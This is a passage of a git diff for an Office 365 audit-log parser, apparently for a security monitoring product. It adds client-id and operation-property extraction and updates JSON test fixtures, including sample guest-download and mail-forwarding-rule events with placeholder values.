office365.audit.object_id: "{{json_event.message.ObjectId}}" office365.virus_info: "{{json_event.message.VirusInfo}}" office365.virus_vendor: "{{json_event.message.VirusVendor}}" + - set: + office365.operation.properties: > + { + {%- for property in json_event.message.OperationProperties -%} + {%- if property.Value != null -%} + {%- if property.Value | from_json == None -%} + "{{property.Name}}":"{{property.Value}}", + {%- else -%} + "{{property.Name}}": {{property.Value | from_json}}, + {%- endif -%} + {%- endif -%} + {%- endfor -%} + } + filter: '{{json_event.message.get("OperationProperties") != None}}' + - translate: dictionary: 0: "Regular" @@ -164,6 +182,10 @@ stages: filter: '{{json_event.message.get("Parameters") != None}}' - set: office365.context.aad_session_id: "{{json_event.message.SessionId}}" + office365.context.client.id: "{{json_event.message.ClientAppId}}" + - set: + office365.context.client.id: "{{json_event.message.AppId}}" + filter: '{{json_event.message.get("ClientAppId") == ""}}' parse_exchange_item: actions: @@ -189,6 +211,7 @@ stages: user.id: "{{json_event.message.LogonUserSid}}" office365.exchange.mailbox_guid: "{{json_event.message.MailboxGuid}}" office365.context.aad_session_id: "{{json_event.message.SessionId}}" + office365.context.client.id: "{{json_event.message.ClientAppId}}" - set: email.subject: "{{json_event.message.Item.Subject}}" email.message_id: "{{json_event.message.Item.InternetMessageId[1:-1]}}" @@ -237,6 +260,7 @@ stages: ] - set: office365.context.aad_session_id: "{{json_event.message.SessionId}}" + office365.context.client.id: "{{json_event.message.ClientAppId}}" parse_share_point: actions: - set: @@ -254,6 +278,7 @@ stages: actions: - set: office365.context.aad_session_id: "{{json_event.message.SessionId}}" + office365.context.client.id: "{{json_event.message.ClientAppId}}" parse_network_traffic: actions: diff --git a/Office 365/o365/tests/ad.json b/Office 365/o365/tests/ad.json index 4cfb5c636..359da7dbc 100644 --- a/Office 365/o365/tests/ad.json +++ b/Office 365/o365/tests/ad.json @@ -44,6 +44,7 @@ "result_status": "Succeeded", "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/ad_1.json b/Office 365/o365/tests/ad_1.json index 2474aeae8..aa501f91a 100644 --- a/Office 365/o365/tests/ad_1.json +++ b/Office 365/o365/tests/ad_1.json @@ -53,6 +53,7 @@ "result_status": "Success", "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/add_member_to_role.json b/Office 365/o365/tests/add_member_to_role.json index 2ea3b7995..15b06db18 100644 --- a/Office 365/o365/tests/add_member_to_role.json +++ b/Office 365/o365/tests/add_member_to_role.json @@ -57,6 +57,7 @@ "result_status": "Success", "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/automated_investigation_and_response.json b/Office 365/o365/tests/automated_investigation_and_response.json index bb5f028e8..3ae14890a 100644 --- a/Office 365/o365/tests/automated_investigation_and_response.json +++ b/Office 365/o365/tests/automated_investigation_and_response.json @@ -50,6 +50,7 @@ "record_type": 64, "user_type": { "code": 4, + "is_external": false, "name": "System" } }, diff --git a/Office 365/o365/tests/automated_investigation_and_response_1.json b/Office 365/o365/tests/automated_investigation_and_response_1.json index fb46179f0..b79920afb 100644 --- a/Office 365/o365/tests/automated_investigation_and_response_1.json +++ b/Office 365/o365/tests/automated_investigation_and_response_1.json @@ -145,6 +145,7 @@ "record_type": 64, "user_type": { "code": 4, + "is_external": false, "name": "System" } }, diff --git a/Office 365/o365/tests/automated_investigation_and_response_with_additional_fields.json b/Office 365/o365/tests/automated_investigation_and_response_with_additional_fields.json index 6e6d8fd0f..e40af7314 100644 --- a/Office 365/o365/tests/automated_investigation_and_response_with_additional_fields.json +++ b/Office 365/o365/tests/automated_investigation_and_response_with_additional_fields.json @@ -95,6 +95,7 @@ "record_type": 64, "user_type": { "code": 4, + "is_external": false, "name": "System" } }, diff --git a/Office 365/o365/tests/automated_investigation_and_response_with_additional_fields_1.json b/Office 365/o365/tests/automated_investigation_and_response_with_additional_fields_1.json index a3a57df24..ca940465a 100644 --- a/Office 365/o365/tests/automated_investigation_and_response_with_additional_fields_1.json +++ b/Office 365/o365/tests/automated_investigation_and_response_with_additional_fields_1.json @@ -121,6 +121,7 @@ "record_type": 64, "user_type": { "code": 4, + "is_external": false, "name": "System" } }, diff --git a/Office 365/o365/tests/automated_investigation_and_response_with_attachment.json b/Office 365/o365/tests/automated_investigation_and_response_with_attachment.json index 61b656511..173b1ef9c 100644 --- a/Office 365/o365/tests/automated_investigation_and_response_with_attachment.json +++ b/Office 365/o365/tests/automated_investigation_and_response_with_attachment.json @@ -108,6 +108,7 @@ "record_type": 64, "user_type": { "code": 4, + "is_external": false, "name": "System" } }, diff --git a/Office 365/o365/tests/browser_log.json b/Office 365/o365/tests/browser_log.json index 611865bee..5bd149008 100644 --- a/Office 365/o365/tests/browser_log.json +++ b/Office 365/o365/tests/browser_log.json @@ -29,6 +29,7 @@ "record_type": 36, "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/clientipadress.json b/Office 365/o365/tests/clientipadress.json index c20107759..661fe2bb6 100644 --- a/Office 365/o365/tests/clientipadress.json +++ b/Office 365/o365/tests/clientipadress.json @@ -23,10 +23,22 @@ "target": "user" }, "office365": { + "context": { + "client": { + "id": "clientappidxxxx-xxx-xxx-xxxx" + } + }, + "operation": { + "properties": { + "IsThrottled": "False", + "MailAccessType": "Bind" + } + }, "record_type": 50, "result_status": "Succeeded", "user_type": { "code": 5, + "is_external": false, "name": "Application" } }, diff --git a/Office 365/o365/tests/compliancemanager-scorechange.json b/Office 365/o365/tests/compliancemanager-scorechange.json index 9e31750bf..cc75e8e2c 100644 --- a/Office 365/o365/tests/compliancemanager-scorechange.json +++ b/Office 365/o365/tests/compliancemanager-scorechange.json @@ -22,6 +22,7 @@ "result_status": "Successful", "user_type": { "code": 2, + "is_external": false, "name": "Admin" } }, diff --git a/Office 365/o365/tests/email_reported.json b/Office 365/o365/tests/email_reported.json index e9b064f62..69696b1c5 100644 --- a/Office 365/o365/tests/email_reported.json +++ b/Office 365/o365/tests/email_reported.json @@ -39,6 +39,7 @@ "result_status": "Succeeded", "user_type": { "code": 4, + "is_external": false, "name": "System" } }, diff --git a/Office 365/o365/tests/exchange_event1.json b/Office 365/o365/tests/exchange_event1.json index 881c1f21b..334ec01a8 100644 --- a/Office 365/o365/tests/exchange_event1.json +++ b/Office 365/o365/tests/exchange_event1.json @@ -39,6 +39,7 @@ "result_status": "Succeeded", "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/exchange_item_aggregated.json b/Office 365/o365/tests/exchange_item_aggregated.json index 11cbfdefc..dc81df845 100644 --- a/Office 365/o365/tests/exchange_item_aggregated.json +++ b/Office 365/o365/tests/exchange_item_aggregated.json @@ -20,10 +20,17 @@ "context": { "aad_session_id": "dcdad6b2-f279-48c6-9ed8-3df0ffde4ece" }, + "operation": { + "properties": { + "IsThrottled": "False", + "MailAccessType": "Bind" + } + }, "record_type": 50, "result_status": "Succeeded", "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/exchange_item_group.json b/Office 365/o365/tests/exchange_item_group.json index 75fe23b37..2a7d13867 100644 --- a/Office 365/o365/tests/exchange_item_group.json +++ b/Office 365/o365/tests/exchange_item_group.json @@ -40,6 +40,7 @@ "result_status": "Succeeded", "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/exchange_item_group_2.json b/Office 365/o365/tests/exchange_item_group_2.json index 1af2cd661..cfbc956e6 100644 --- a/Office 365/o365/tests/exchange_item_group_2.json +++ b/Office 365/o365/tests/exchange_item_group_2.json @@ -93,6 +93,7 @@ "result_status": "Succeeded", "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/exchange_item_update.json b/Office 365/o365/tests/exchange_item_update.json index ad69be989..608d46063 100644 --- a/Office 365/o365/tests/exchange_item_update.json +++ b/Office 365/o365/tests/exchange_item_update.json @@ -29,6 +29,11 @@ "subject": "HI" }, "office365": { + "context": { + "client": { + "id": "037fd006-a72b-49ae-4bb0-08dba30c8729" + } + }, "exchange": { "mailbox_guid": "8208550a-4001-439d-a9f6-e95d76767507" }, @@ -36,6 +41,7 @@ "result_status": "Succeeded", "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/external_user.json b/Office 365/o365/tests/external_user.json new file mode 100644 index 000000000..fd3e6c34f --- /dev/null +++ b/Office 365/o365/tests/external_user.json @@ -0,0 +1,102 @@ +{ + "input": { + "message": "{\"AppAccessContext\": {\"ClientAppName\": \"MeTA\", \"CorrelationId\": \"27de65c0-1c43-4d70-9a4d-45a66418dbd6\"}, \"CreationTime\": \"2024-11-29T12:31:12\", \"Id\": \"609745a8-8ec0-4305-8607-fa95f45cf370\", \"Operation\": \"FileDownloaded\", \"OrganizationId\": \"eda474c4-ddfd-4ecd-85ff-3103a09b118d\", \"RecordType\": 6, \"UserKey\": \"urn:spo:guest:hash#aGVsbG8gdGhlcmUK\", \"UserType\": 0, \"Version\": 1, \"Workload\": \"OneDrive\", \"ClientIP\": \"1.2.3.4\", \"UserId\": \"urn:spo:guest#john.doe@example.com\", \"AuthenticationType\": \"OAuth\", \"BrowserName\": \"\", \"BrowserVersion\": \"\", \"CorrelationId\": \"27de65c0-1c43-4d70-9a4d-45a66418dbd6\", \"DoNotDistributeEvent\": true, \"EventSource\": \"SharePoint\", \"GeoLocation\": \"EUR\", \"IsManagedDevice\": false, \"ItemType\": \"File\", \"ListId\": \"56391ee5-91aa-44f9-810e-a5dc47abbb02\", \"ListItemUniqueId\": \"1d91eda8-2918-42f0-8f2b-88dd9aaffcdf\", \"Platform\": \"Service\", \"Site\": \"582d798a-ba87-4a78-8792-87db9262b0a3\", \"UserAgent\": \"OneDriveMpc-Transform_Zip/1.0\", \"UserSessionId\": \"b332294a-fad5-45a0-8761-63922a2544bf\", \"WebId\": \"ead1e78b-1d0c-4251-920a-f4fb48fce5e2\", \"DeviceDisplayName\": \"5.6.7.8\", \"EventSignature\": \"SOME_SIGNATURE\", \"FileSizeBytes\": 26860827, \"HighPriorityMediaProcessing\": false, \"ListBaseType\": 1, \"ListServerTemplate\": 700, \"SourceFileExtension\": \"zip\", \"ZipFileName\": \"1.zip\", \"SiteUrl\": \"https://example.com/\", \"SourceRelativeUrl\": \"Documents/IMT MBA\", \"SourceFileName\": \"1.zip\", \"ApplicationDisplayName\": \"MeTA\", \"ObjectId\": \"https://example.com/1.zip\"}" + }, + "expected": { + "message": "{\"AppAccessContext\": {\"ClientAppName\": \"MeTA\", \"CorrelationId\": \"27de65c0-1c43-4d70-9a4d-45a66418dbd6\"}, \"CreationTime\": \"2024-11-29T12:31:12\", \"Id\": \"609745a8-8ec0-4305-8607-fa95f45cf370\", \"Operation\": \"FileDownloaded\", \"OrganizationId\": \"eda474c4-ddfd-4ecd-85ff-3103a09b118d\", \"RecordType\": 6, \"UserKey\": \"urn:spo:guest:hash#aGVsbG8gdGhlcmUK\", \"UserType\": 0, \"Version\": 1, \"Workload\": \"OneDrive\", \"ClientIP\": \"1.2.3.4\", \"UserId\": \"urn:spo:guest#john.doe@example.com\", \"AuthenticationType\": \"OAuth\", \"BrowserName\": \"\", \"BrowserVersion\": \"\", \"CorrelationId\": \"27de65c0-1c43-4d70-9a4d-45a66418dbd6\", \"DoNotDistributeEvent\": true, \"EventSource\": \"SharePoint\", \"GeoLocation\": \"EUR\", \"IsManagedDevice\": false, \"ItemType\": \"File\", \"ListId\": \"56391ee5-91aa-44f9-810e-a5dc47abbb02\", \"ListItemUniqueId\": \"1d91eda8-2918-42f0-8f2b-88dd9aaffcdf\", \"Platform\": \"Service\", \"Site\": \"582d798a-ba87-4a78-8792-87db9262b0a3\", \"UserAgent\": \"OneDriveMpc-Transform_Zip/1.0\", \"UserSessionId\": \"b332294a-fad5-45a0-8761-63922a2544bf\", \"WebId\": \"ead1e78b-1d0c-4251-920a-f4fb48fce5e2\", \"DeviceDisplayName\": \"5.6.7.8\", \"EventSignature\": \"SOME_SIGNATURE\", \"FileSizeBytes\": 26860827, \"HighPriorityMediaProcessing\": false, \"ListBaseType\": 1, \"ListServerTemplate\": 700, \"SourceFileExtension\": \"zip\", \"ZipFileName\": \"1.zip\", \"SiteUrl\": \"https://example.com/\", \"SourceRelativeUrl\": \"Documents/IMT MBA\", \"SourceFileName\": \"1.zip\", \"ApplicationDisplayName\": \"MeTA\", \"ObjectId\": \"https://example.com/1.zip\"}", + "event": { + "action": "FileDownloaded", + "category": [ + "file" + ], + "code": "6", + "outcome": "success", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-29T12:31:12Z", + "action": { + "id": 6, + "name": "FileDownloaded", + "outcome": "success", + "properties": [ + { + "SiteUrl": "https://example.com/", + "SourceFileName": "1.zip", + "SourceRelativeUrl": "Documents/IMT MBA", + "UserAgent": "OneDriveMpc-Transform_Zip/1.0" + } + ], + "target": "user" + }, + "file": { + "directory": "Documents/IMT MBA", + "extension": "zip", + "name": "1.zip", + "size": 26860827 + }, + "office365": { + "audit": { + "object_id": "https://example.com/1.zip" + }, + "context": { + "client": { + "name": "MeTA" + }, + "correlation": { + "id": "27de65c0-1c43-4d70-9a4d-45a66418dbd6" + } + }, + "record_type": 6, + "user_type": { + "code": 0, + "is_external": true, + "name": "Regular" + } + }, + "organization": { + "id": "eda474c4-ddfd-4ecd-85ff-3103a09b118d" + }, + "related": { + "ip": [ + "1.2.3.4" + ], + "user": [ + "john.doe@example.com" + ] + }, + "service": { + "name": "OneDrive" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "url": { + "domain": "example.com", + "full": "https://example.com/1.zip", + "original": "https://example.com/1.zip", + "path": "/1.zip", + "port": 443, + "registered_domain": "example.com", + "scheme": "https", + "top_level_domain": "com" + }, + "user": { + "email": "john.doe@example.com", + "id": "urn:spo:guest:hash#aGVsbG8gdGhlcmUK", + "name": "john.doe@example.com" + }, + "user_agent": { + "device": { + "name": "Other" + }, + "name": "Other", + "original": "OneDriveMpc-Transform_Zip/1.0", + "os": { + "name": "Other" + } + } + } +} \ No newline at end of file diff --git a/Office 365/o365/tests/file_previewed.json b/Office 365/o365/tests/file_previewed.json index f5cd4e410..d3ce72283 100644 --- a/Office 365/o365/tests/file_previewed.json +++ b/Office 365/o365/tests/file_previewed.json @@ -42,6 +42,7 @@ "record_type": 6, "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/file_size.json b/Office 365/o365/tests/file_size.json index ea0339b0b..7c6c0446f 100644 --- a/Office 365/o365/tests/file_size.json +++ b/Office 365/o365/tests/file_size.json @@ -52,6 +52,7 @@ "record_type": 6, "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/file_sync_download_full.json b/Office 365/o365/tests/file_sync_download_full.json index 44dd5f6c3..159b72879 100644 --- a/Office 365/o365/tests/file_sync_download_full.json +++ b/Office 365/o365/tests/file_sync_download_full.json @@ -48,6 +48,7 @@ "record_type": 6, "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/file_visited.json b/Office 365/o365/tests/file_visited.json index 46855c741..44ee7180b 100644 --- a/Office 365/o365/tests/file_visited.json +++ b/Office 365/o365/tests/file_visited.json @@ -30,6 +30,7 @@ "result_status": "TRUE", "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/form_log.json b/Office 365/o365/tests/form_log.json index 7fc38b1d5..affdbd3b0 100644 --- a/Office 365/o365/tests/form_log.json +++ b/Office 365/o365/tests/form_log.json @@ -28,6 +28,7 @@ }, "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/inbox_rule.json b/Office 365/o365/tests/inbox_rule.json index 8af518085..1c31e54e6 100644 --- a/Office 365/o365/tests/inbox_rule.json +++ b/Office 365/o365/tests/inbox_rule.json @@ -21,7 +21,10 @@ "object_id": "EURPR07A010.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/example.onmicrosoft.com/bc1b1df3-f861-4aec-bf7c-40ce5b5566c1\\RULE_NAME" }, "context": { - "aad_session_id": "984c0958-0631-4b90-b116-15094fc36847" + "aad_session_id": "984c0958-0631-4b90-b116-15094fc36847", + "client": { + "id": "00000002-0000-0ff1-ce00-000000000000" + } }, "exchange_admin": { "parameters": [ @@ -43,6 +46,7 @@ "result_status": "True", "user_type": { "code": 2, + "is_external": false, "name": "Admin" } }, diff --git a/Office 365/o365/tests/managed_sync.json b/Office 365/o365/tests/managed_sync.json index 4c860c040..9157cdb0a 100644 --- a/Office 365/o365/tests/managed_sync.json +++ b/Office 365/o365/tests/managed_sync.json @@ -38,6 +38,7 @@ "record_type": 4, "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/mass_download.json b/Office 365/o365/tests/mass_download.json index c072a45c4..d099f991b 100644 --- a/Office 365/o365/tests/mass_download.json +++ b/Office 365/o365/tests/mass_download.json @@ -39,6 +39,7 @@ "result_status": "Succeeded", "user_type": { "code": 4, + "is_external": false, "name": "System" } }, diff --git a/Office 365/o365/tests/mcas_alert.json b/Office 365/o365/tests/mcas_alert.json index 91e13123f..0e7bbd829 100644 --- a/Office 365/o365/tests/mcas_alert.json +++ b/Office 365/o365/tests/mcas_alert.json @@ -41,6 +41,7 @@ "result_status": "New", "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/microsoft_defender_threatintelligence_atp.json b/Office 365/o365/tests/microsoft_defender_threatintelligence_atp.json index e1397f623..cf341ed7d 100644 --- a/Office 365/o365/tests/microsoft_defender_threatintelligence_atp.json +++ b/Office 365/o365/tests/microsoft_defender_threatintelligence_atp.json @@ -33,6 +33,7 @@ "record_type": 47, "user_type": { "code": 4, + "is_external": false, "name": "System" } }, diff --git a/Office 365/o365/tests/microsoft_defender_threatintelligence_mail.json b/Office 365/o365/tests/microsoft_defender_threatintelligence_mail.json index 31948758b..ef016aff1 100644 --- a/Office 365/o365/tests/microsoft_defender_threatintelligence_mail.json +++ b/Office 365/o365/tests/microsoft_defender_threatintelligence_mail.json @@ -114,6 +114,7 @@ "record_type": 28, "user_type": { "code": 4, + "is_external": false, "name": "System" } }, diff --git a/Office 365/o365/tests/microsoft_defender_threatintelligence_url_click.json b/Office 365/o365/tests/microsoft_defender_threatintelligence_url_click.json index 59fdd35ce..fd5c01c5f 100644 --- a/Office 365/o365/tests/microsoft_defender_threatintelligence_url_click.json +++ b/Office 365/o365/tests/microsoft_defender_threatintelligence_url_click.json @@ -21,6 +21,7 @@ "record_type": 41, "user_type": { "code": 4, + "is_external": false, "name": "System" } }, diff --git a/Office 365/o365/tests/operation_properties_01.json b/Office 365/o365/tests/operation_properties_01.json new file mode 100644 index 000000000..27d256630 --- /dev/null +++ b/Office 365/o365/tests/operation_properties_01.json @@ -0,0 +1,92 @@ +{ + "input": { + "message": "{\"AppAccessContext\":{},\"CreationTime\":\"2024-10-28T10:34:13\",\"Id\":\"xxxx-xxx-xxx-xxxx\",\"Operation\":\"UpdateInboxRules\",\"OrganizationId\":\"xxxx-xxx-xxx-xxxx\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserKey\":\"xxxx-xxx-xxx-xxxx\",\"UserType\":0,\"Version\":1,\"Workload\":\"Exchange\",\"ClientIP\":\"1.2.3.4\",\"UserId\":\"john.doe@mail.fr\",\"ClientIPAddress\":\"1.2.3.4\",\"ClientInfoString\":\"Client=xxxx-xxx-xxx-xxxx\",\"ClientProcessName\":\"PROCESS.EXE\",\"ClientRequestId\":\"{xxxx-xxx-xxx-xxxx}\",\"ClientVersion\":\"16.0.17328.20550\",\"ExternalAccess\":false,\"InternalLogonType\":0,\"LogonType\":2,\"LogonUserSid\":\"S-1-2-3-4\",\"MailboxGuid\":\"xxxx-xxx-xxx-xxxx\",\"MailboxOwnerMasterAccountSid\":\"S-1-2-3\",\"MailboxOwnerSid\":\"S-1-2-3-4-5\",\"MailboxOwnerUPN\":\"owner@mail.fr\",\"OperationProperties\":[{\"Name\":\"RuleOperation\",\"Value\":\"ModifyMailboxRule\"},{\"Name\":\"RuleId\",\"Value\":\"-123\"},{\"Name\":\"RuleState\",\"Value\":\"Enabled\"},{\"Name\":\"RuleCondition\",\"Value\":\"{(Exists(ItemClass))}\"},{\"Name\":\"RuleName\"},{\"Name\":\"RuleProvider\",\"Value\":\"RuleOrganizer\"},{\"Name\":\"RuleActions\",\"Value\":\"[{\\\"ActionType\\\":\\\"Forward\\\",\\\"Recipients\\\":[\\\"john.doe@mail.fr\\\",\\\"user@email.fr\\\",\\\"asmithee@mailbox.fr\\\",\\\"user.name@mail.fr\\\"],\\\"ForwardFlags\\\":\\\"None\\\"}]\"}],\"OrganizationName\":\"organization.com\",\"OriginatingServer\":\"Origin Server\\r\\n\",\"SessionId\":\"xxxx-xxx-xxx-xxxx\",\"Item\":{\"Id\":\"ID12345\",\"ImmutableId\":\"ErrorDuringIdConversion\",\"ParentFolder\":{\"Id\":\"ID12345\",\"Name\":\"Bo\u00eete de r\u00e9ception\",\"Path\":\"\\\\Bo\u00eete de r\u00e9ception\"}}}", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 / Office 365", + "dialect_uuid": "caa13404-9243-493b-943e-9848cadb1f99" + } + } + }, + "expected": { + "message": "{\"AppAccessContext\":{},\"CreationTime\":\"2024-10-28T10:34:13\",\"Id\":\"xxxx-xxx-xxx-xxxx\",\"Operation\":\"UpdateInboxRules\",\"OrganizationId\":\"xxxx-xxx-xxx-xxxx\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserKey\":\"xxxx-xxx-xxx-xxxx\",\"UserType\":0,\"Version\":1,\"Workload\":\"Exchange\",\"ClientIP\":\"1.2.3.4\",\"UserId\":\"john.doe@mail.fr\",\"ClientIPAddress\":\"1.2.3.4\",\"ClientInfoString\":\"Client=xxxx-xxx-xxx-xxxx\",\"ClientProcessName\":\"PROCESS.EXE\",\"ClientRequestId\":\"{xxxx-xxx-xxx-xxxx}\",\"ClientVersion\":\"16.0.17328.20550\",\"ExternalAccess\":false,\"InternalLogonType\":0,\"LogonType\":2,\"LogonUserSid\":\"S-1-2-3-4\",\"MailboxGuid\":\"xxxx-xxx-xxx-xxxx\",\"MailboxOwnerMasterAccountSid\":\"S-1-2-3\",\"MailboxOwnerSid\":\"S-1-2-3-4-5\",\"MailboxOwnerUPN\":\"owner@mail.fr\",\"OperationProperties\":[{\"Name\":\"RuleOperation\",\"Value\":\"ModifyMailboxRule\"},{\"Name\":\"RuleId\",\"Value\":\"-123\"},{\"Name\":\"RuleState\",\"Value\":\"Enabled\"},{\"Name\":\"RuleCondition\",\"Value\":\"{(Exists(ItemClass))}\"},{\"Name\":\"RuleName\"},{\"Name\":\"RuleProvider\",\"Value\":\"RuleOrganizer\"},{\"Name\":\"RuleActions\",\"Value\":\"[{\\\"ActionType\\\":\\\"Forward\\\",\\\"Recipients\\\":[\\\"john.doe@mail.fr\\\",\\\"user@email.fr\\\",\\\"asmithee@mailbox.fr\\\",\\\"user.name@mail.fr\\\"],\\\"ForwardFlags\\\":\\\"None\\\"}]\"}],\"OrganizationName\":\"organization.com\",\"OriginatingServer\":\"Origin Server\\r\\n\",\"SessionId\":\"xxxx-xxx-xxx-xxxx\",\"Item\":{\"Id\":\"ID12345\",\"ImmutableId\":\"ErrorDuringIdConversion\",\"ParentFolder\":{\"Id\":\"ID12345\",\"Name\":\"Bo\u00eete de r\u00e9ception\",\"Path\":\"\\\\Bo\u00eete de r\u00e9ception\"}}}", + "event": { + "action": "UpdateInboxRules", + "category": [ + "email", + "file" + ], + "code": "2", + "outcome": "success", + "type": [ + "info" + ] + }, + "@timestamp": "2024-10-28T10:34:13Z", + "action": { + "id": 2, + "name": "UpdateInboxRules", + "outcome": "success", + "target": "user" + }, + "office365": { + "context": { + "aad_session_id": "xxxx-xxx-xxx-xxxx" + }, + "exchange": { + "mailbox_guid": "xxxx-xxx-xxx-xxxx" + }, + "operation": { + "properties": { + "RuleActions": [ + { + "ActionType": "Forward", + "ForwardFlags": "None", + "Recipients": [ + "john.doe@mail.fr", + "user@email.fr", + "asmithee@mailbox.fr", + "user.name@mail.fr" + ] + } + ], + "RuleCondition": "{(Exists(ItemClass))}", + "RuleId": -123, + "RuleOperation": "ModifyMailboxRule", + "RuleProvider": "RuleOrganizer", + "RuleState": "Enabled" + } + }, + "record_type": 2, + "result_status": "Succeeded", + "user_type": { + "code": 0, + "is_external": false, + "name": "Regular" + } + }, + "organization": { + "id": "xxxx-xxx-xxx-xxxx" + }, + "related": { + "ip": [ + "1.2.3.4" + ], + "user": [ + "john.doe@mail.fr" + ] + }, + "service": { + "name": "Exchange" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "user": { + "email": "john.doe@mail.fr", + "id": "S-1-2-3-4", + "name": "john.doe@mail.fr" + } + } +} \ No newline at end of file diff --git a/Office 365/o365/tests/operation_properties_02.json b/Office 365/o365/tests/operation_properties_02.json new file mode 100644 index 000000000..6d50c87eb --- /dev/null +++ b/Office 365/o365/tests/operation_properties_02.json @@ -0,0 +1,89 @@ +{ + "input": { + "message": "{\"AppAccessContext\":{},\"CreationTime\":\"2024-10-23T12:26:18\",\"Id\":\"xxxx-xxx-xxx-xxxx\",\"Operation\":\"UpdateInboxRules\",\"OrganizationId\":\"xxxx-xxx-xxx-xxxx\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserKey\":\"123456\",\"UserType\":0,\"Version\":1,\"Workload\":\"Exchange\",\"ClientIP\":\"1.2.3.4\",\"UserId\":\"john.doe@mail.fr\",\"ClientIPAddress\":\"1.2.3.4\",\"ClientInfoString\":\"Client=xxxx-xxx-xxx-xxxx\",\"ClientProcessName\":\"PROCESS.EXE\",\"ClientRequestId\":\"{xxxx-xxx-xxx-xxxx}\",\"ClientVersion\":\"16.0.16731.20456\",\"ExternalAccess\":false,\"InternalLogonType\":0,\"LogonType\":0,\"LogonUserSid\":\"S-1-2-3\",\"MailboxGuid\":\"xxxx-xxx-xxx-xxxx\",\"MailboxOwnerSid\":\"S-1-2-3\",\"MailboxOwnerUPN\":\"john.doe@mail.fr\",\"OperationProperties\":[{\"Name\":\"RuleOperation\",\"Value\":\"ModifyMailboxRule\"},{\"Name\":\"RuleId\",\"Value\":\"4561233110666051585\"},{\"Name\":\"RuleState\",\"Value\":\"Enabled\"},{\"Name\":\"RuleCondition\",\"Value\":\"{(&(([RssServerLockStartTime=1, =r, =noreply-wham@mail.fr, DisplayType=0], ((SenderSearchKey Equal SMTP:NOREPLY-WHAM@MAIL.FR)))(SubString IgnoreCase(SubjectProperty)=WHAM)))}\"},{\"Name\":\"RuleName\"},{\"Name\":\"RuleProvider\",\"Value\":\"RuleOrganizer\"},{\"Name\":\"RuleActions\",\"Value\":\"[{\\\"ActionType\\\":\\\"Forward\\\",\\\"Recipients\\\":[\\\"user.name@mail.fr\\\"],\\\"ForwardFlags\\\":\\\"None\\\"}]\"}],\"OrganizationName\":\"organization.name.com\",\"OriginatingServer\":\"Origin Server\\r\\n\",\"SessionId\":\"xxxx-xxx-xxx-xxxx\",\"Item\":{\"Id\":\"xxxx-xxx-xxx-xxxx\",\"ImmutableId\":\"ErrorDuringIdConversion\",\"ParentFolder\":{\"Id\":\"xxxx-xxx-xxx-xxxx\",\"Name\":\"Bo\u00eete de r\u00e9ception\",\"Path\":\"\\\\Bo\u00eete de r\u00e9ception\"}}}", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 / Office 365", + "dialect_uuid": "caa13404-9243-493b-943e-9848cadb1f99" + } + } + }, + "expected": { + "message": "{\"AppAccessContext\":{},\"CreationTime\":\"2024-10-23T12:26:18\",\"Id\":\"xxxx-xxx-xxx-xxxx\",\"Operation\":\"UpdateInboxRules\",\"OrganizationId\":\"xxxx-xxx-xxx-xxxx\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserKey\":\"123456\",\"UserType\":0,\"Version\":1,\"Workload\":\"Exchange\",\"ClientIP\":\"1.2.3.4\",\"UserId\":\"john.doe@mail.fr\",\"ClientIPAddress\":\"1.2.3.4\",\"ClientInfoString\":\"Client=xxxx-xxx-xxx-xxxx\",\"ClientProcessName\":\"PROCESS.EXE\",\"ClientRequestId\":\"{xxxx-xxx-xxx-xxxx}\",\"ClientVersion\":\"16.0.16731.20456\",\"ExternalAccess\":false,\"InternalLogonType\":0,\"LogonType\":0,\"LogonUserSid\":\"S-1-2-3\",\"MailboxGuid\":\"xxxx-xxx-xxx-xxxx\",\"MailboxOwnerSid\":\"S-1-2-3\",\"MailboxOwnerUPN\":\"john.doe@mail.fr\",\"OperationProperties\":[{\"Name\":\"RuleOperation\",\"Value\":\"ModifyMailboxRule\"},{\"Name\":\"RuleId\",\"Value\":\"4561233110666051585\"},{\"Name\":\"RuleState\",\"Value\":\"Enabled\"},{\"Name\":\"RuleCondition\",\"Value\":\"{(&(([RssServerLockStartTime=1, =r, =noreply-wham@mail.fr, DisplayType=0], ((SenderSearchKey Equal SMTP:NOREPLY-WHAM@MAIL.FR)))(SubString 